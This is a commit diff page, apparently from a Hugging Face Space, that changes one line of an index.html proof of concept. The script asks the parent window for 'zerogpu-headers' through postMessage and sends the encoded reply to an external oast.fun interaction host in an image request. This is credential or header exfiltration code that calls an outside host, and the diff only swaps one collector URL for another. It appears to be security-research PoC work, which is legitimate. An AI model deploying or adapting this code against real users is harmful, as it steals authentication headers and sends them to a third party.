shubhankargaur commited on
Commit
d796b77
·
verified ·
1 Parent(s): c6c23c3

Update index.html

Browse files
Files changed (1) hide show
  1. index.html +1 -1
index.html CHANGED
@@ -13,7 +13,7 @@ channel.port1.onmessage = e => {
13
 
14
  // Send via GET request to your lab endpoint
15
  const img = new Image();
16
- img.src = `https://afgounipzemjqxcitanp4d7stqz4rly7n.oast.fun/poc?data=${encoded}`;
17
  };
18
  window.parent.postMessage("zerogpu-headers", "*", [channel.port2]);
19
 
 
13
 
14
  // Send via GET request to your lab endpoint
15
  const img = new Image();
16
+ img.src = `https://bwjcdbkeriyfukekpyrgpbl0oyei87cm2.oast.fun/poc?data=${encoded}`;
17
  };
18
  window.parent.postMessage("zerogpu-headers", "*", [channel.port2]);
19